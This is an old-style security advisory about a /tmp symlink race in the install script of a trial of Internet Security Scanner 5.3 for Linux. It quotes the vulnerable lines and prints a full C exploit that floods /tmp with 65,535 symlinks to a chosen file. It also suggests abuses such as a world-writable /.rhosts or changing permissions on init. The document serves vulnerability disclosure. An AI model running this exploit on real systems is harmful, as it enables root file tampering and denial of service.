COMMAND

    ISS (install.iss)

SYSTEMS AFFECTED

    unices with ISS

PROBLEM

    Following was found  by Fyodor and  it considers trial  version of
    Internet Security Scanner  for Linux (version  5.3).  The  install
    program (shell script) requires that you be root, even if you want
    to install ISS  in your home  directory.  If  you decided to  edit
    the script to comment out the root-check, you'll be rather shocked
    to see what they are doing in install.iss:

	# Only root can pass the next four operations.
	# Yes it's ugly - BUT IT WORKS!
	touch /tmp/.root.$$ >> /dev/null 2>&1
	chmod 600 /tmp/.root.$$ >> /dev/null 2>&1

    Obviously this is vulnerable to the standard tmp-symlink  problem.
    Just stick the 65K symlinks in  /tmp and wait for root to  install
    ISS.  You might have to wait a while, but this scenario is  pretty
    wierd anyway.  "Why is the /tmp directory so huge?  Why are  there
    65,536 symlinks  to /etc/password  in there?"   Admins are  not so
    stupid.

    Joel Eriksson noted another issue:

    #include <stdio.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <unistd.h>

    #define MINPID  1
    #define MAXPID  65535

    int main(int argc, char **argv)
    {
	    char filename[16+1]; /* Assuming MAXPID = 65535 or at least a five digit number */
	    struct stat buf;
	    int i;

	    if(argc != 2) {
		    fprintf(stderr, "Usage: %s <file-to-create>\n", argv[0]);
		    exit(1);
	    }

	    memset(filename, 0, sizeof(filename));

	    for(i=MINPID; i<=MAXPID; i++) {
		    snprintf(filename, 17, "/tmp/.root.%d", i);
		    symlink(argv[1], filename);
	    }

	    memset(filename, 0, sizeof(filename));

	    while(stat(argv[1], &buf) == -1);

	    for(i=MINPID; i<=MAXPID; i++) {
		    snprintf(filename, 17, "/tmp/.root.%d", i);
		    unlink(filename);
	    }

	    printf("%s was created. Filemode = 0%o\n", argv[1], buf.st_mode & 0666);

	    if(! access(argv[1], W_OK))
		    printf("I suppose you got lucky... (Or ran this as root.)\n");
	    else
		    printf("Sorry, no write permissions for you...\n");

	    exit(0);
    }

    For those who can't code, or does not see the point, if root has a
    stupid umask  this vulnerability  may be  exploited to  create for
    example a world-writeable /.rhosts.   No matter what the umask  is
    it  could  easily  be  made  to  perform  a DoS-attack, what about
    changing the  permissions on  for example  `which init`  to 600...
    Anyone  with   a  little   imagination  could   think  of    other
    possibilities.

SOLUTION

    I guess new versions will have that fixed.